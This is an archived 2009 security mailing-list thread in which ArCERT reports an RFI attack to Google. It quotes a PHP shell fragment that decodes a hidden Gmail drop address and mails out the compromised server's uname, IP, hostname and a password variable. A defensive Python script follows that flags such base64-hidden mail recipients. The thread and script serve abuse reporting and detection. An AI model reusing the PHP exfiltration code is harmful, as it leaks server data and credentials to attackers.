[nsp-sec] Attn google - gmail drop box - rfi attack
Chris Morrow
morrowc at ops-netman.net
Mon Jun 1 16:30:11 EDT 2009
Assume it's 'ok' to pass this (minus headers/listinfos) on to the internal
abuse@ folks, yes?
On Mon, 1 Jun 2009, Rodolfo Baader wrote:
> ----------- nsp-security Confidential --------
>
> Hi!
>
> While investigating the following URLs involved in an RFI attack
> -http://compraloenlinea.com.mx//copyright[1].txt
> -http://compraloenlinea.com.mx//readme[1].txt
>
> we found that the attacker was sending information to the following email address:
> $creator="fr33sh3ll at gmail.com"
>
> See below [*1] for part of the code we found.
>
> Could you please investigate and take the appropriate actions.
>
> Regards,
> R.
>
> *===========================================================
> [*1] Piece of the code
> ...
> $creator=base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");
> ($safe_mode)?($safez="ON"):($safez="OFF_HEHE");
> $base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
> $name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 =
> gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST'];
> $msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2
> $pwds";
> $from ="From: ".$writ."___=".$safez."<tool@".$_SERVER['HTTP_HOST'].">";
> mail( $creator, $subj, $msg, $from);
>
> *===========================================================
>
> --
> -----------------------------------------------
> ArCERT - http://www.arcert.gov.ar
>
> Te: (54-11) 4343-9001 int.512/514 | 4345-0383
> Fax:(54-11) 4343-7458
>
> Av.R. Saenz Peña 511 - Of:514
> C1035AAA - Ciudad Autonoma de Buenos Aires
> Argentina
> -----------------------------------------------
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________
>
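
A triage sketch for the pattern in the quoted snippet, added here as an example and not part of either message: it decodes `base64_decode("...")` literals in a PHP source file and reports those that decode to an e-mail address, noting whether the same variable is the first argument to `mail()`. The function names, regexes and the last sample line are assumptions made for illustration.

```python
import base64
import binascii
import re

# Lines taken from the snippet quoted in the report above; the last line is
# constructed here to show a literal that is decoded but not reported.
SAMPLE = r'''
$creator=base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");
$subj = $_SERVER['HTTP_HOST'];
mail( $creator, $subj, $msg, $from);
$banner=base64_decode("aGVsbG8gd29ybGQ=");
'''

# $var = base64_decode("<literal>") with a plain base64 alphabet literal
ASSIGN_RE = re.compile(
    r'\$(\w+)\s*=\s*base64_decode\(\s*["\']([A-Za-z0-9+/]+={0,2})["\']\s*\)')
# mail($var, ...): captures the variable used as recipient
MAIL_RE = re.compile(r'\bmail\s*\(\s*\$(\w+)')
EMAIL_RE = re.compile(r'^[\w.+-]+@[\w-]+(\.[\w-]+)+$')


def decode_literal(b64):
    """Return the decoded text, or None if it is not valid base64/ASCII."""
    try:
        return base64.b64decode(b64, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_dropboxes(php_source):
    """List base64-hidden e-mail addresses and whether mail() sends to them."""
    recipients = set(MAIL_RE.findall(php_source))
    findings = []
    for var, b64 in ASSIGN_RE.findall(php_source):
        text = decode_literal(b64)
        if text and EMAIL_RE.match(text):
            findings.append({"variable": var, "address": text,
                             "mail_recipient": var in recipients})
    return findings


if __name__ == "__main__":
    for finding in find_dropboxes(SAMPLE):
        print(finding)
```

Run over a web root after an RFI incident, the same function gives a short list of report-back addresses to hand to the mail provider's abuse desk; it only catches string literals, not values assembled at run time.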